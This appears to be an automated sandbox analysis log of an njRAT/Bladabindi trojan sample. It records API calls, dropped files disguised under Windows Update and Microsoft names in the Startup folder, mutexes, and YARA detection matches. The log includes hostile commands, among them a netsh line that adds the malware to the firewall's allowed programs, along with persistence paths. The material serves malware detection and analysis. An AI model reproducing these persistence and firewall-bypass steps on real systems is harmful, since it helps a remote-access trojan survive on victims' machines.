Source: Explower.exe1.4.dr Static PE information: section name:
Source: Explower.exe2.4.dr Static PE information: section name:
Source: Explower.exe3.4.dr Static PE information: section name:
Source: Explower.exe4.4.dr Static PE information: section name:
Source: Explower.exe5.4.dr Static PE information: section name:
Source: Explower.exe6.4.dr Static PE information: section name:
Source: Explower.exe7.4.dr Static PE information: section name:
Source: Explower.exe8.4.dr Static PE information: section name:
Source: system.exe.4.dr Static PE information: section name:
Source: Notepad.exe.4.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\server.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A199DC NtReadFile, 4_2_00A199DC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1996A NtClose, 4_2_00A1996A
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19974 NtSetInformationFile, 4_2_00A19974
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19A34 NtCreateFile, 4_2_00A19A34
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19B14 NtProtectVirtualMemory, 4_2_00A19B14
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A190A2 NtQuerySecurityObject, 4_2_00A190A2
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19098 NtSetSecurityObject, 4_2_00A19098
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A190D8 NtNotifyChangeDirectoryFile, 4_2_00A190D8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19024 NtOpenKeyEx, 4_2_00A19024
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19050 NtSetVolumeInformationFile, 4_2_00A19050
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A191A3 NtFlushBuffersFile, 4_2_00A191A3
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A191BF NtExtendSection, 4_2_00A191BF
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A191C8 NtAccessCheck, 4_2_00A191C8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19130 NtFsControlFile, 4_2_00A19130
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A192AC NtQueryValueKey, 4_2_00A192AC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A192EC NtCreateKey, 4_2_00A192EC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1922C NtOpenKey, 4_2_00A1922C
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19236 NtEnumerateValueKey, 4_2_00A19236
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19278 NtQueryKey, 4_2_00A19278
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A193FE NtFlushKey, 4_2_00A193FE
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A193C6 NtDeleteKey, 4_2_00A193C6
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A193CE NtDeleteValueKey, 4_2_00A193CE
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19334 NtEnumerateKey, 4_2_00A19334
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19374 NtSetValueKey, 4_2_00A19374
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A194A4 NtQueryMultipleValueKey, 4_2_00A194A4
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A194F8 NtReplaceKey, 4_2_00A194F8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19438 NtLoadKey2, 4_2_00A19438
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19406 NtLoadKey, 4_2_00A19406
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19442 NtNotifyChangeKey, 4_2_00A19442
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A195A4 NtWriteFile, 4_2_00A195A4
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19586 NtTerminateProcess, 4_2_00A19586
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A195FC NtQueryObject, 4_2_00A195FC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19522 NtSaveKey, 4_2_00A19522
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19502 NtRestoreKey, 4_2_00A19502
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1957E NtUnloadKey, 4_2_00A1957E
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19540 NtSetInformationKey, 4_2_00A19540
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19698 NtQueryDirectoryFileEx, 4_2_00A19698
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19630 NtQueryDirectoryFile, 4_2_00A19630
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A197A6 NtDeleteFile, 4_2_00A197A6
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A197AE NtLockFile, 4_2_00A197AE
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1970C NtOpenSection, 4_2_00A1970C
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19716 NtDuplicateObject, 4_2_00A19716
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19760 NtQueryVolumeInformationFile, 4_2_00A19760
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A198B0 NtMapViewOfSection, 4_2_00A198B0
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19810 NtUnlockFile, 4_2_00A19810
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19873 NtUnmapViewOfSection, 4_2_00A19873
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1987C NtQuerySection, 4_2_00A1987C
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19857 NtQueryFullAttributesFile, 4_2_00A19857
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A199A8 NtQueryInformationFile, 4_2_00A199A8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19910 NtCreateSection, 4_2_00A19910
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19958 NtClose, 4_2_00A19958
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19A9C NtOpenFile, 4_2_00A19A9C
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19AEF NtQueryAttributesFile, 4_2_00A19AEF
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A18EA8 NtCreateThread, 4_2_00A18EA8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A18FBC NtCreateUserProcess, 4_2_00A18FBC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A18F0B NtResumeThread, 4_2_00A18F0B
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A18F14 NtCreateProcess, 4_2_00A18F14
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A18F64 NtCreateProcessEx, 4_2_00A18F64
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00D9BEC6 NtQuerySystemInformation, 4_2_00D9BEC6
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00D9BE8B NtQuerySystemInformation, 4_2_00D9BE8B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A299DC NtReadFile, 14_2_00A299DC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A2996A NtClose, 14_2_00A2996A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29974 NtSetInformationFile, 14_2_00A29974
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29A34 NtCreateFile, 14_2_00A29A34
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29B14 NtProtectVirtualMemory, 14_2_00A29B14
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A290A2 NtQuerySecurityObject, 14_2_00A290A2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A298B0 NtMapViewOfSection, 14_2_00A298B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29098 NtSetSecurityObject, 14_2_00A29098
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A290D8 NtNotifyChangeDirectoryFile, 14_2_00A290D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29024 NtOpenKeyEx, 14_2_00A29024
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29810 NtUnlockFile, 14_2_00A29810
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29873 NtUnmapViewOfSection, 14_2_00A29873
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A2987C NtQuerySection, 14_2_00A2987C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29050 NtSetVolumeInformationFile, 14_2_00A29050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29857 NtQueryFullAttributesFile, 14_2_00A29857
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A291A3 NtFlushBuffersFile, 14_2_00A291A3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A299A8 NtQueryInformationFile, 14_2_00A299A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A291BF NtExtendSection, 14_2_00A291BF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A291C8 NtAccessCheck, 14_2_00A291C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29130 NtFsControlFile, 14_2_00A29130
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29910 NtCreateSection, 14_2_00A29910
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29958 NtClose, 14_2_00A29958
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A292AC NtQueryValueKey, 14_2_00A292AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29A9C NtOpenFile, 14_2_00A29A9C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29AEF NtQueryAttributesFile, 14_2_00A29AEF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A292EC NtCreateKey, 14_2_00A292EC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A2922C NtOpenKey, 14_2_00A2922C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29236 NtEnumerateValueKey, 14_2_00A29236
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29278 NtQueryKey, 14_2_00A29278
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A293FE NtFlushKey, 14_2_00A293FE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A293C6 NtDeleteKey, 14_2_00A293C6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A293CE NtDeleteValueKey, 14_2_00A293CE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29334 NtEnumerateKey, 14_2_00A29334
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29374 NtSetValueKey, 14_2_00A29374
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A294A4 NtQueryMultipleValueKey, 14_2_00A294A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A294F8 NtReplaceKey, 14_2_00A294F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29438 NtLoadKey2, 14_2_00A29438
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29406 NtLoadKey, 14_2_00A29406
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29442 NtNotifyChangeKey, 14_2_00A29442
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A295A4 NtWriteFile, 14_2_00A295A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29586 NtTerminateProcess, 14_2_00A29586
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A295FC NtQueryObject, 14_2_00A295FC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29522 NtSaveKey, 14_2_00A29522
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29502 NtRestoreKey, 14_2_00A29502
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A2957E NtUnloadKey, 14_2_00A2957E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29540 NtSetInformationKey, 14_2_00A29540
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A28EA8 NtCreateThread, 14_2_00A28EA8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29698 NtQueryDirectoryFileEx, 14_2_00A29698
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29630 NtQueryDirectoryFile, 14_2_00A29630
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A297A6 NtDeleteFile, 14_2_00A297A6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A297AE NtLockFile, 14_2_00A297AE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A28FBC NtCreateUserProcess, 14_2_00A28FBC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A28F0B NtResumeThread, 14_2_00A28F0B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A2970C NtOpenSection, 14_2_00A2970C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29716 NtDuplicateObject, 14_2_00A29716
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A28F14 NtCreateProcess, 14_2_00A28F14
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29760 NtQueryVolumeInformationFile, 14_2_00A29760
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A28F64 NtCreateProcessEx, 14_2_00A28F64
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Windows\SysWOW64\Explower.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: String function: 006202AC appears 51 times
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608
Source: MyProg.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.00000000014F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemscorwks.dllT vs LisectAVT_2403002B_366.exe
Source: LisectAVT_2403002B_366.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: RRqyIX.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: RRqyIX.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: classification engine Classification label: mal100.spre.phis.troj.adwa.evad.winEXE@31/45@1/2
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 1_2_00AE119F
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00D9BC86 AdjustTokenPrivileges, 4_2_00D9BC86
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00D9BC4F AdjustTokenPrivileges, 4_2_00D9BC4F
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 15_2_00A3119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 15_2_00A3119F
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 22_2_0051119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 22_2_0051119F
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_007A0914 GetDiskFreeSpaceExA, 0_2_007A0914
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Program Files (x86)\Explower.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File created: C:\Users\user\AppData\Roaming\app
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\server.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\server.exe Mutant created: \Sessions\1\BaseNamedObjects\8d9ba8e0d68a3d306883c186c2013957
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4888
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\server.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File read: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe "C:\Users\user\Desktop\LisectAVT_2403002B_366.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe"
Source: C:\Users\user\AppData\Local\Temp\server.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
